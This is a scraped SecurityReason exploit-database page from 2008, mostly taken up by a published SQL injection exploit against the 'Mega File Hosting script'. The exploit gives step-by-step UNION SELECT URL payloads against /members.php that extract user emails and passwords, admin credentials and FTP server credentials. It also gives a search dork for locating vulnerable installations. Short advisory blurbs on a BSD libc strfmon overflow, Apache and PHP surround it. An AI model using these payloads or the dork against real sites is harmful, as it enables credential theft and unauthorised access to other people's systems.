|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : ExploitAlert | ||
 ExploitAlert : 3904 Credit : TurkishWarriorr Date : 13.5.2008 Exploit Code : ######################################## Script: Mega File Hosting script ######################################## Type: SQL Injection ######################################## 1923TURK.ORG TURKiSHWARRiORR Step 1: Register an account Step 2: login and go to /members.php?folders=1 Step 3: Create a folder with any name Exploitation options: ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,emai l),pass,5,6,7,8+from+users+-- to get the users ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+fr om+setting+-- to get the admin info ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+fro m+server+-- to get the ftp server info (if its configured) ####################################### dork: "Powered by: MFH v1" ####################################### |
||
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
» Apache (mod_status) |
||
» Apache (mod_proxy_ftp) |
||
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |